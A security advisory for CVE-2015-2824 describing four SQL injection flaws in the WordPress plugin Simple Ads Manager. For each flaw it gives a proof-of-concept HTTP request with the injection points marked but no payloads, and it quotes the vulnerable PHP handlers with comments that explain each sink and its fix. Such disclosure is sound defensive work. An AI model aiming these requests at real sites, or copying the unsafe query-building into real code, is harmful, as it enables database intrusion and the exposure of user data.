
Wordpress plugin Simple Ads Manager - SQL Injection


#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh ([email protected]) & ITAS Team

::PROOF OF CONCEPT::

—SQL INJECTION 1—

  • REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3

(Decoded, the body is `hits[0][]=…&hits[1][]=…&hits[2][]=…`. The handler below reads both `$hit[0]` and `$hit[1]` from every `hits[N]` sub-array and interpolates them unquoted, so a payload in any of these positions reaches the INSERT statement.)

  • Vulnerable file: simple-ads-manager/sam-ajax.php

  • Vulnerable code:

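    case 'sam_ajax_sam_hits':
        // Sink: $_POST['hits'] is expected to be an array of arrays. The only
        // validation is is_array() on the outer value; the individual elements
        // are never cast, escaped or whitelisted before reaching SQL below.
        if(isset($_POST['hits']) && is_array($_POST['hits'])) {
            $hits = $_POST['hits'];
            $values = '';
            $remoteAddr = $_SERVER['REMOTE_ADDR'];
            foreach($hits as $hit) {
                // $hit[1] and $hit[0] are attacker-controlled strings placed
                // directly into the VALUES tuple with no quoting at all, so any
                // SQL text supplied in hits[N][] becomes part of the statement.
                // $remoteAddr is quoted but also interpolated without escaping.
                $values .= ((empty($values)) ? '' : ', ')
                    . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
            }
            // String-built INSERT executed via $wpdb->query() with no prepare().
            // Fix: build each tuple with $wpdb->prepare('(%d, %d, NOW(), 0, %s)', ...)
            // (use %d if id/pid are integer columns, which the unquoted
            // interpolation suggests; otherwise %s) before concatenating.
            $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
            $result = $wpdb->query($sql);
            // Both branches echo the full SQL statement back to the caller, and
            // the failure branch also echoes the raw input and the built VALUES
            // list. That lets an attacker see exactly how a payload was embedded
            // and tune it; the 'sql'/'hits'/'values' keys should not be returned.
            if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
            else echo json_encode(array(
                'success' => false,
                'result' => $result,
                'sql' => $sql,
                'hits' => $hits,
                'values' => $values
            ));
        }
        break;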

—SQL INJECTION 2—
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page

  • Vulnerable file: simple-ads-manager/sam-ajax-admin.php

  • Vulnerable code:
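    case 'sam_ajax_load_posts':
    // Sink: $custs comes straight from $_REQUEST['cstr'] (GET, POST and,
    // depending on request_order, cookies) and is spliced into a single-quoted
    // SQL literal below without escaping or validation.
    $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
    // $sPost / $sPage are only used as display labels in the loop further down,
    // not in the SQL. Note that PHP has already URL-decoded $_REQUEST values, so
    // this urldecode() is a second decode (e.g. %2527 -> %27 -> ').
    $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';
    $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';

    //set @row_num = 0;
    //SELECT @row_num := @row_num + 1 AS recid
    // A cstr value containing a single quote closes the 'post,page...' literal
    // and everything after it is parsed as SQL inside the WHERE clause.
    // Fix: pass the list through $wpdb->prepare() with a %s placeholder, or
    // validate cstr as a comma-separated list of known post type names first.
    $sql = "SELECT
              wp.id,
              wp.post_title AS title,
              wp.post_type AS type
            FROM
              $postTable wp
            WHERE
              wp.post_status = 'publish' AND
              FIND_IN_SET(wp.post_type, 'post,page{$custs}')
            ORDER BY wp.id;";

    $posts = $wpdb->get_results($sql, ARRAY_A);

    // Relabel post types for display and number the rows. The loop iterates by
    // reference and $val is never unset() afterwards, so it keeps pointing at
    // the last element (unchanged here, but a known PHP footgun).
    $k = 0;
    foreach($posts as &$val) {
      switch($val['type']) {
        case 'post':
          $val['type'] = $sPost;
          break;
        case 'page':
          $val['type'] = $sPage;
          break;
        default:
          $val['type'] = $sPost . ': '.$val['type'];
          break;
      }
      $k++;
      $val['recid'] = $k;
    }
    $out = array(
      'status' => 'success',
      'total' => count($posts),
      'records' => $posts
    );
    break;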
    

—SQL INJECTION 3—
+REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1

(searchTerm is read from $_GET in the handler below, so it must travel in the query string even though the action is sent in the POST body.)
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

action=load_combo_data

  • Vulnerable file: simple-ads-manager/sam-ajax-admin.php
    +Vulnerable code: from line 225 to 255
    case 'sam_ajax_load_combo_data':
    // All three parameters come from the query string and are used without
    // any validation or escaping.
    $page = $_GET['page'];
    $rows = $_GET['rows'];
    // Sink 1: $searchTerm is interpolated into the LIKE literal of both queries
    // below. A single quote in the value closes the literal; '%' and '_' are
    // also not escaped, so they act as LIKE wildcards.
    $searchTerm = $_GET['searchTerm'];
    // $offset is the only derived value that is cast. Raw $rows is interpolated
    // into the LIMIT clause further down, so it is a second unescaped input.
    $offset = ((int)$page - 1) * (int)$rows;
    // Note the result set already includes user_email, so the endpoint's own
    // output is sensitive even before any injection.
    $sql = "SELECT
    wu.id,
    wu.display_name AS title,
    wu.user_nicename AS slug,
    wu.user_email AS email
    FROM
    $uTable wu
    WHERE wu.user_nicename LIKE '{$searchTerm}%'
    ORDER BY wu.id
    LIMIT $offset, $rows;";
    $users = $wpdb->get_results($sql, ARRAY_A);
    // Sink 2: the same unescaped $searchTerm in the COUNT query.
    // Fix for both: $wpdb->prepare() with %s for the search term (run through
    // $wpdb->esc_like() first) and %d placeholders for the LIMIT values.
    $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE
    '{$searchTerm}%';";
    $rTotal = $wpdb->get_var($sql);
    // (int)$rows of 0 would divide by zero here; only a robustness issue.
    $total = ceil((int)$rTotal/(int)$rows);
    $out = array(
    'page' => $page,
    'records' => count($users),
    'rows' => $users,
    'total' => $total,
    'offset' => $offset
    );
    break;

—SQL INJECTION 4—

  • REQUEST

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE>

(Each of the six role-label parameters is independently injectable; any one of them is sufficient.)

  • Vulnerable file: simple-ads-manager/sam-ajax-admin.php

  • Vulnerable code: from line 188 to 223
    case 'sam_ajax_load_users':
    // Six display labels are taken from $_REQUEST (GET, POST and, depending on
    // request_order, cookies). PHP has already URL-decoded these values, so the
    // urldecode() calls are a second decode. None of them are escaped.
    $roleSubscriber = (isset($_REQUEST['subscriber'])) ?
    urldecode($_REQUEST['subscriber']) : 'Subscriber';
    $roleContributor = (isset($_REQUEST['contributor'])) ?
    urldecode($_REQUEST['contributor']) : 'Contributor';
    $roleAuthor = (isset($_REQUEST['author'])) ?
    urldecode($_REQUEST['author']) : 'Author';
    $roleEditor = (isset($_REQUEST['editor'])) ?
    urldecode($_REQUEST['editor']) : 'Editor';
    $roleAdministrator = (isset($_REQUEST["admin"])) ?
    urldecode($_REQUEST["admin"]) : 'Administrator';
    $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?
    urldecode($_REQUEST['sadmin']) : 'Super Admin';
    // Sink: every label is embedded as a single-quoted literal inside the CASE
    // expression. A quote in any of them breaks out of the literal and the rest
    // of the value is executed as SQL. These are presentation strings only, so
    // the fix is to keep them out of the query entirely (return the numeric
    // level and map it to a label in PHP after the query) or, at minimum, to
    // pass each one through $wpdb->prepare() as a %s placeholder.
    $sql = "SELECT
    wu.id,
    wu.display_name AS title,
    wu.user_nicename AS slug,
    (CASE wum.meta_value
    WHEN 0 THEN '$roleSubscriber'
    WHEN 1 THEN '$roleContributor'
    WHEN 2 THEN '$roleAuthor'
    ELSE
    IF(wum.meta_value > 2 AND wum.meta_value <= 7,
    '$roleEditor',
    IF(wum.meta_value > 7 AND wum.meta_value <= 10,
    '$roleAdministrator',
    IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
    )
    )
    END) AS role
    FROM $uTable wu
    INNER JOIN $umTable wum
    ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
    ORDER BY wu.id;";
    $users = $wpdb->get_results($sql, ARRAY_A);
    // Number the rows. The by-reference loop variable is not unset() afterwards
    // (a known PHP footgun; harmless here since $val is not reused).
    $k = 0;
    foreach($users as &$val) {
    $k++;
    $val['recid'] = $k;
    }
    // The full user list (id, display name, slug, role) is returned to the caller.
    $out = $users;
    break;

Best Regards

ITAS Team (www.itas.vn)